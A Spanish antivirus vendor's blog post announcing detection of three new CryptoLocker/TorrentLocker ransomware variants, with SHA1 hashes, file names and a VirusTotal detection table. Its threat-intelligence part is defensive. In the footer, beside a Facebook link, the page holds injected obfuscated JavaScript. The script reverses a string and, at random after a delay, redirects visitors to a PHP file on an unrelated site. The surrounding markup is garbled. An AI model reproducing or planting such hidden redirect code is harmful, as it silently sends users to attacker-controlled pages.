NUEVAS VARIANTES DE CRYPTOLOCKER TORRENT, UNO DE ELLOS CON NUEVO ICONO DE FLECHA VERDE
Otras tres variantes de Cryptolocker pasan a ser controladas espeicifcamente a partir del ELISTARA 34.63 de hoy, dos de ellas con el ya conocido icono de carpeta y otra con una flecha verde a la izquierda,
tolocker del 26-5-2016″ width=”208″ height=”67″ />
de la cual pasamos a ofrecer analisis de virustotal.
Los hashes SHA1 correspondientes son los siguientes:
“10878C5F9B643CF02F77E07887E35ACE4573DDA7” -> uwifekiz.exe 377693
“55D302F9A623166B5D354B2DC904E013D8CBF2B6” -> etohycav.exe 528896
“A0F82C0C192F4D5D9BFD41A2E142133B4B6DA24D” -> rmasaquz.exe 623104
Siendo el del icono de la flecha el primero de ellos, cuyo preanalisis de virustotal ofrece el siguiente informe:
MD5 53978433f2378cb97afcad4a3cbe70d8
SHA1 10878c5f9b643cf02f77e07887e35ace4573dda7
Tamaño del fichero 368.8 KB ( 377693 bytes )
SHA256: e9708d07a80cdffb667f7d3f028510ff0cda6abf110b5179296152ba509de5a8
Nombre: uwifekiz.exe
Detecciones: 13 / 57
Fecha de análisis: 2016-05-26 07:55:58 UTC ( hace 0 minutos )
0 1
Antivirus Resultado Actualización
ESET-NOD32 Win32/Filecoder.TorrentLocker.A 20160526
Emsisoft Trojan-Dropper.Win32.Agent (A) 20160526
Ikarus Trojan.Win32.Filecoder 20160526
K7AntiVirus Trojan ( 004e24c81 ) 20160526
K7GW Trojan ( 004e24c81 ) 20160526
Kaspersky Trojan-Ransom.NSIS.Onion.pvj 20160526
McAfee Artemis!53978433F237 20160526
McAfee-GW-Edition BehavesLike.Win32.Dropper.fc 20160526
Qihoo-360 HEUR/QVM42.1.Malware.Gen 20160526
Sophos Mal/Generic-S 20160526
Symantec Trojan.Cryptolocker.H 20160526
TrendMicro Ransom_CRYPTLOCK.AH 20160526
TrendMicro-HouseCall Ransom_CRYPTLOCK.AH 20160526
Aunque son relativamente pocos los AV que ya lo controlan (solo 13 de 57) ya lo hacen Kaspersky y McAfee (aunque heuristicamente) por lo que recordamos la conveniencia de configurar a MUY ALTA el nivel de sensibilidad heuristica del VirusScan.
Dicha versión del ELISTARA 34.63 que los detecta y elimina,e stará disponible en nuestra web a partir de LAS 18 H CEST de hoy.
saludos
ms, 26-5-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolocker-del-26-5-2016.jpg”><img decoding=){kind=link}
Los comentarios están cerrados.